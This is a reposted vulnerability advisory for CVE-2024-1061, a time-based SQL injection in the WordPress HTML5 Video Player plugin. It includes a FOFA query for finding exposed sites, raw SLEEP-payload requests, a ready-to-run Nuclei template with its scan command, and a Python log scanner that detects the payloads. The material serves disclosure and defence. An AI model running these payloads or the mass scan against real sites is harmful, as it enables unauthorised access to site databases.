CVE-2024-1061

admin, 2024-02-04 09:40:07


01 Vulnerability Name

WordPress Plugin HTML5 Video Player security vulnerability

02 Affected Versions

WordPress Plugin HTML5 Video Player, versions before 2.5.25

03 Vulnerability Description

WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog site on a server running PHP and MySQL. A WordPress plugin is an add-on application for that platform.

WordPress Plugin HTML5 Video Player versions before 2.5.25 contain a security vulnerability: the id parameter of the get_view function is vulnerable to SQL injection.

04 FOFA Search Query
"wordpress" && body="html5-video-player"


05 Vulnerability Reproduction

The site normally responds in under 1 second. Craft a PoC request that makes the database sleep for 6 seconds, then check whether the response time exceeds 6 seconds.

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Change the sleep to 10 seconds and send the request again, checking whether the response time now exceeds 10 seconds.

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Reproduction successful.

06 Nuclei PoC

The PoC file contents are as follows:

id: CVE-2024-1061

info:
  name: WordPress HTML5 Video Player - SQL Injection
  author: xxcdd
  severity: high
  description: |
    WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
  reference:
    - https://www.tenable.com/security/research/tra-2024-02
    - https://wordpress.org/plugins/html5-video-player
    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-1061
    cwe-id: CWE-89
  metadata:
    verified: true
    fofa-query: '"wordpress" && body="html5-video-player"'
  tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player

http:
  - method: GET
    path:
      - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+-"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5 && duration<=7'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "created_at", "video_id")'
        condition: and
# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950

Run the PoC:

nuclei.exe -l data/wordpress.txt -t mypoc/cve/CVE-2024-1061.yaml
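As a defender-side counterpart to the timing checks in the reproduction section and the nuclei matcher above, here is an added example (not code from the original post or from the plugin) that scans web-server access logs for requests to the h5vp view route whose id parameter is non-numeric or carries a time-based SQL payload. The route and parameter names are taken from the PoC request on this page; the log lines are constructed, and the choice of a numeric-only id as the expected shape is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format, abridged).
# Lines 1-2 carry the SLEEP payloads shown in the write-up (raw and
# percent-encoded); lines 3-4 are legitimate calls to the same endpoint.
SAMPLE_LOG = r"""
192.0.2.10 - - [04/Feb/2024:09:40:07 +0800] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 512
192.0.2.10 - - [04/Feb/2024:09:40:19 +0800] "GET /?rest_route=/h5vp/v1/view/1&id=1%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(10)))a)--%20- HTTP/1.1" 200 512
198.51.100.7 - - [04/Feb/2024:09:41:02 +0800] "GET /?rest_route=/h5vp/v1/view/1&id=1 HTTP/1.1" 200 512
198.51.100.7 - - [04/Feb/2024:09:41:05 +0800] "GET /wp-json/h5vp/v1/view/1?id=1 HTTP/1.1" 200 512
""".strip()

REQ_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/\d')
ROUTE_RE = re.compile(r"^/h5vp/v1/view(?:/|$)")      # the vulnerable REST route
TIME_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\b", re.I)

def rest_route(target):
    """Return (REST route, decoded query dict); WordPress accepts ?rest_route= or /wp-json/."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes '+' and %XX
    route = qs.get("rest_route", [""])[0]
    if not route and parts.path.startswith("/wp-json/"):
        route = parts.path[len("/wp-json"):]
    return route, qs

def classify_request(target):
    """None for benign traffic, otherwise the reason the request is suspicious."""
    route, qs = rest_route(target)
    if not ROUTE_RE.match(route):
        return None
    ids = qs.get("id", [])
    if any(TIME_RE.search(v) for v in ids):
        return "time-based payload"
    if any(not v.isdigit() for v in ids):  # assumption: get_view expects a numeric id
        return "non-numeric id"
    return None

def scan_log(text):
    """Return one finding per suspicious h5vp view request in the log text."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        reason = classify_request(m.group(2))
        if reason:
            findings.append({"ip": m.group(1), "target": m.group(2), "reason": reason})
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags only the two SLEEP requests; the same check can be applied to a WAF or SIEM feed, and a spike of such hits with multi-second response times matches the timing signature the nuclei template keys on.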


07 Remediation

Upgrade to the latest version.

08 Originally published on the WeChat official account (AI与网安): CVE-2024-1061

Please keep this link when reposting (CN-SEC中文网, with thanks to the original author): CVE-2024-1061 http://cn-sec.com/archives/2466613.html
